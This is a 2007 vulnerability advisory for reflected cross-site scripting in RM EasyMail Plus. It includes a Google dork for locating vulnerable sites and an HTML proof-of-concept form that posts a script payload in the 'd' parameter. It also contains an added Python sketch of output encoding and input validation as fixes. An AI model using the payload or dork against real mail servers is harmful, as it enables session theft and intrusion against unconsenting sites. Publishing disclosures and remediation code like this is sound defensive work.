RM EasyMail Plus - Cross-Site Scripting Exploit
Monday, 21 May 2007
The variable 'd' (when used with POST and GET) is vulnerable to Cross-Site Scripting attacks.
Vulnerable: RM EasyMail Plus (other versions should also be vulnerable)
Google d0rk: intitle:"Powered by RM EasyMail Plus"
John Martinelli
john@martinelli.com
RedLevel Security
RedLevel.org
May 6th, 2007
!-->
<html>
<head><title>RM EasyMail Plus - Cross-Site Scripting Exploit</title></head><body>
<center><br><br><font size=4>RM EasyMail Plus - Cross-Site Scripting Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br>Google d0rk: <a href="http://www.google.com/search?hl=en&q=%22powered+by+rm+easymail+plus%22">intitle:"Powered by RM EasyMail Plus"</a></font><br>
<br><br>
<form action="http://mail.target.com/cp/ps/Main/login/Login" method="post">
<input type=hidden name="s" value="1">
<input name="d" size=75 value=">'><script>alert(1);</script>">
<input type=submit value="Execute XSS Attack" class="button">
</form>
</center>
</body>
</html>
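The fix on the server side is to encode 'd' for the context it is echoed into. The following is an added example, not code from RM EasyMail Plus or from the advisory's author. It assumes 'd' is reflected inside a quoted HTML attribute and is meant to hold a mail domain; the function names and the rendered markup are hypothetical.

```python
import html
import re

# Constructed sample: the value the advisory's proof-of-concept form sends in 'd'.
POC_VALUE = ">'><script>alert(1);</script>"

# Assumption: 'd' is expected to hold a hostname, so a strict allowlist applies.
DOMAIN_RE = re.compile(
    r"(?=.{1,253}\Z)([a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}", re.I
)


def render_unsafe(d: str) -> str:
    """Vulnerable pattern: request data concatenated straight into an attribute."""
    return "<input name='d' value='" + d + "'>"


def render_safe(d: str) -> str:
    """Encode &, <, >, \" and ' for the attribute context; always quote the attribute."""
    return '<input name="d" value="' + html.escape(d, quote=True) + '">'


def validate_domain(d: str) -> bool:
    """Input validation as a second layer; output encoding remains the primary fix."""
    return DOMAIN_RE.fullmatch(d) is not None


def breaks_out(rendered: str) -> bool:
    """True if a raw <script> tag survived into the generated markup."""
    return "<script" in rendered.lower()


def handle_login_field(d: str) -> str:
    """Reject values that are not hostnames, and encode whatever is echoed back."""
    if not validate_domain(d):
        d = ""  # do not reflect rejected input at all
    return render_safe(d)


if __name__ == "__main__":
    print("unsafe :", render_unsafe(POC_VALUE))
    print("safe   :", render_safe(POC_VALUE))
    print("handled:", handle_login_field(POC_VALUE))
```

The same encoding has to be applied on both the GET and POST code paths, since the advisory reports the parameter as vulnerable through either method.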
Original article:
http://redlevel.org/wp-content/uploads/2007/05/rmeasymail.txt